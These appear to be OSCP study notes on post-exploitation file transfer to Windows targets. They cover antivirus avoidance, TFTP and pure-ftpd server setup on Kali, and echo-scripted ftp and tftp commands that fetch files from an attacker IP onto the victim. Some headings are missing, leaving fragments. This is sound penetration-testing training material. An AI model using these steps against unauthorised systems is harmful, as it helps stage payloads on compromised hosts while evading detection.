Antivirus may be triggered by an upload, so be careful when transferring files. One of OffSec's favourite ways to avoid AV is to use legitimate administrative tools during post exploitation phase.
Unix environments will often have tools such as nc, curl, wgetpreinstalled, making file transfer simple. However, on Windows, the process is not as straight forward.
Most netcat-like connections provide a non-interactive shell. Interactive commands like ftp on Windows won't work. So we have to transfer files using non-interactive methods.
Windows XP and 2003. Windows 7, 2008 and above will need to be explicitly added during installation.
Easy, but slow speed of 2kb/sec
On Kali:
mkdir /tftp # DIRECTORY HOSTING FILES
atftpd --daemon --port 69 /tftp
On Windows:
tftp -i [kali ip] get [file]
All Windows.
Fast speed of 206kb/sec. Scripts available in OSCP-Notes/scripts
On Kali:
#!/bin/bash
apt update && apt install pure-ftpd
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome # use user offsec when logging into ftp
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome # DIRECTORY HOSTING FILES
chown -R ftpuser:ftpgroup /ftphome/
service pure-ftpd restart
On Windows:
echo open [kali ip] 21> ftp.txt
echo USER offsec>> ftp.txt # username
echo ftp>> ftp.txt # password
echo bin>> ftp.txt # binary mode
echo GET [file]>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
# or
echo open [kali ip] 21>ftp.txt&echo USER offsec>>ftp.txt&echo ftp>>ftp.txt&echo bin>>ftp.txt&echo GET [file]>>ftp.txt&echo bye>>ftp.txt&ftp -v -n -s:ftp.txt
Windows XP, 2003